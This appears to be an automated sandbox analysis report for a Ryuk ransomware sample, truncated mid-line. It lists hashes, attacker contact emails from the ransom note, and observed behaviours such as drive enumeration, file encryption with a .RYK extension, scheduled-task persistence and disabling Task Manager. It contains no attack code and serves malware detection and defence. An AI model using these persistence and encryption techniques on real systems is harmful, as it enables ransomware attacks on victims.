Analysis
-
max time kernel
179s -
max time network
248s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2022 11:00
Static task
static1
Behavioral task
behavioral1
Sample
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Resource
win10v2004-20220812-en
General
-
Target
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
-
Size
885KB
-
MD5
622bc38dee08e70e91e2be32a58b6d1f
-
SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2
-
SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
-
SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
-
SSDEEP
12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
RyanRinse@mailfence.com
RyanRinse@firemail.de
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
attrib.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exedescription ioc process File opened (read-only) \??\M: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\R: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\Z: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\O: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\P: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\Q: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\S: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\Y: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\E: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\I: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\B: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\K: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\L: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\N: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\A: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\X: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\G: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\H: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\J: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\V: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\W: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\F: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\T: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened (read-only) \??\U: be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe -
Drops file in Program Files directory 64 IoCs
Processes:
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\an.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\SubsystemController.man.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\ApproveRegister.asx.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\trusted.libraries.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\RegisterWrite.dwg.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\7-Zip\7z.sfx.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar.[RyanRinse@mailfence.com].RYK be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2692 schtasks.exe 1352 schtasks.exe 1740 schtasks.exe 2432 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2752 taskkill.exe 3380 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exepid process 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2752 taskkill.exe Token: SeDebugPrivilege 3380 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4116 wrote to memory of 4824 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4824 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4824 wrote to memory of 1740 4824 cmd.exe schtasks.exe PID 4824 wrote to memory of 1740 4824 cmd.exe schtasks.exe PID 4116 wrote to memory of 4184 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4184 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3292 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3292 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4828 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4828 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4828 wrote to memory of 2432 4828 cmd.exe schtasks.exe PID 4828 wrote to memory of 2432 4828 cmd.exe schtasks.exe PID 4116 wrote to memory of 1560 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1560 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 1560 wrote to memory of 4944 1560 cmd.exe attrib.exe PID 1560 wrote to memory of 4944 1560 cmd.exe attrib.exe PID 4116 wrote to memory of 920 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 920 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 920 wrote to memory of 2692 920 cmd.exe schtasks.exe PID 920 wrote to memory of 2692 920 cmd.exe schtasks.exe PID 4116 wrote to memory of 4736 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4736 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4736 wrote to memory of 1352 4736 cmd.exe schtasks.exe PID 4736 wrote to memory of 1352 4736 cmd.exe schtasks.exe PID 4116 wrote to memory of 116 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 116 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 116 wrote to memory of 1780 116 cmd.exe attrib.exe PID 116 wrote to memory of 1780 116 cmd.exe attrib.exe PID 4116 wrote to memory of 3552 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3552 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 3552 wrote to memory of 1748 3552 cmd.exe attrib.exe PID 3552 wrote to memory of 1748 3552 cmd.exe attrib.exe PID 4116 wrote to memory of 1920 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1920 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3064 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3064 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 1920 wrote to memory of 1384 1920 cmd.exe cmd.exe PID 1920 wrote to memory of 1384 1920 cmd.exe cmd.exe PID 4116 wrote to memory of 3828 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3828 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe 